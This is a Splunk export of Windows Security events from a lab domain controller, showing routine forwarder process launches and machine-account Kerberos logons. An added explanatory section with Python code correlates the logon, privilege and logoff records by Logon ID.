Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263922
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263924
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263925
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:36:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263926
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263928
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1588
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263927
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:36:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263931
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x786B7A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:36:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263930
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x786B7A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51667
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:36:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263929
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x786B7A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263933
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1224
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 02:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263932
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x157c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 02:37:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263934
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa18
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 02:37:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263935
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 02:37:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263936
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 02:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263938
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 02:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263937
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263944
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789C23
Logon Type: 3
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263943
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x789C23
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51675
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263942
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789C23
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263941
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789BB7
Logon Type: 3
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263940
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x789BB7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 51674
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:37:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263939
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x789BB7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:37:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263947
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78A976
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:37:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263946
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x78A976
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51684
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 02:37:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263945
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x78A976
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263949
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xde0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
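The explanatory text above (the 4624 logon, 4634 logoff and 4688 process-creation templates) says what the fields mean but not how an analyst uses them: the working pivot in an export like this one is to join the 4624, 4672 and 4634 records on Logon ID and to decode the 4688 token elevation type. The Python below is an added example, not part of this export or of any Microsoft or Splunk tooling. It parses records in the Splunk text layout shown on this page, keys sessions on (ComputerName, Logon ID) because the 4634 template notes that Logon IDs are only unique between reboots on one computer, and maps the 4688 Token Elevation Type resource strings %%1936, %%1937 and %%1938 to types 1, 2 and 3. The SAMPLE records are constructed to mirror records on this page with fields the code does not need dropped; the function names and the inner `session` helper are this example's own.

```python
"""Correlate Splunk-exported Windows Security events (4624/4672/4634/4688) by Logon ID. Added example,
not part of this export or of Microsoft/Splunk tooling; SAMPLE mirrors records on this page, trimmed."""
import re

TS_RE = re.compile(r"^\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2} [AP]M$")  # a timestamp line opens a record
TOP_RE = re.compile(r"^([A-Za-z]+)=(.*)$")                          # Key=Value header lines
TOKEN_ELEVATION = {"%%1936": 1, "%%1937": 2, "%%1938": 3}           # 4688 resource strings -> type 1/2/3

SAMPLE = r"""
04/19/2021 02:37:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x78A976
04/19/2021 02:37:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Logon Information:
Logon Type: 3
New Logon:
Logon ID: 0x78A976
This event is generated when a logon session is created. It is generated on the computer that was accessed.
04/19/2021 02:37:55 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x78A976
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeDebugPrivilege
04/19/2021 02:38:13 PM
EventCode=4688
ComputerName=win-dc-209.attackrange.local
Creator Subject:
Logon ID: 0x3E7
Process Information:
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
"""

def parse_events(text):
    """Split the export into records: header fields plus 'sections' ({"New Logon": {key: value}})."""
    events, event, section, last = [], None, None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or (event is None and not TS_RE.match(line)):
            continue
        if TS_RE.match(line):
            event = {"timestamp": line, "sections": {}}
            events.append(event)
            section = last = None
        elif section is None and (top := TOP_RE.match(line)):
            event[top[1]] = top[2]
        elif line.endswith(":") and line.count(":") == 1:           # "New Logon:" opens a section
            section, last = line[:-1], None
            event["sections"][section] = {}
        elif section is not None and ":" in line:                   # "Key: Value", split on the FIRST
            key, _, value = line.partition(":")                      # colon so "C:\..." keeps its own
            last = key.strip()
            event["sections"][section][last] = value.strip()
        elif section is not None and last and re.fullmatch(r"\S+", line):  # 4672 privilege continuation
            cur = event["sections"][section][last]                   # (template prose has spaces: ignored)
            event["sections"][section][last] = (cur if isinstance(cur, list) else [cur]) + [line]
    return events

def correlate_sessions(events):
    """Join 4624 (logon), 4672 (privileges), 4634 (logoff) on (ComputerName, Logon ID); order-free, since
    this export lists the newest RecordNumber first. Logon IDs repeat after a reboot: key on boot epoch too."""
    sessions = {}
    def session(ev, logon_id):
        return sessions.setdefault((ev.get("ComputerName"), logon_id.lower()),
                                   {"logon": None, "logoff": None, "privileges": []})
    for ev in events:
        code, sec = ev.get("EventCode"), ev["sections"]
        if code == "4624":
            session(ev, sec["New Logon"]["Logon ID"]).update(
                logon=ev["timestamp"], logon_type=sec["Logon Information"]["Logon Type"])
        elif code == "4672":
            privs = sec["Subject"]["Privileges"]
            session(ev, sec["Subject"]["Logon ID"])["privileges"] = privs if isinstance(privs, list) else [privs]
        elif code == "4634":
            session(ev, sec["Subject"]["Logon ID"])["logoff"] = ev["timestamp"]
    return sessions

def privileged_network_logons(sessions, privilege="SeDebugPrivilege"):
    """Logon IDs of type-3 (network) sessions that were handed `privilege`: a hunting pivot."""
    return sorted(lid for (_, lid), s in sessions.items() if s.get("logon_type") == "3" and privilege in s["privileges"])

def process_creations(events):
    """Flatten 4688 records to child, parent, command line, creator session and numeric token type."""
    rows = []
    for ev in (e for e in events if e.get("EventCode") == "4688"):
        pi, creator = ev["sections"]["Process Information"], ev["sections"]["Creator Subject"]
        rows.append({"new_process": pi["New Process Name"], "parent": pi["Creator Process Name"],
                     "command_line": pi["Process Command Line"], "creator_logon_id": creator["Logon ID"].lower(),
                     "token_type": TOKEN_ELEVATION.get(pi["Token Elevation Type"])})
    return rows
```

Two details visible on this page drive the design. Within one second the export lists the newer RecordNumber first (the 4634 for 0x78A976, RecordNumber 263947, precedes its 4624, RecordNumber 263946), so the join cannot assume a logon arrives before its logoff. And the same Logon GUID {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7} appears on several 4624 records with different Logon IDs, so the GUID is the handle for correlating back to a KDC event, not an identifier for one session; session identity is the Logon ID, scoped to the host and, on real data, to the boot epoch.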
04/19/2021 02:38:08 PM
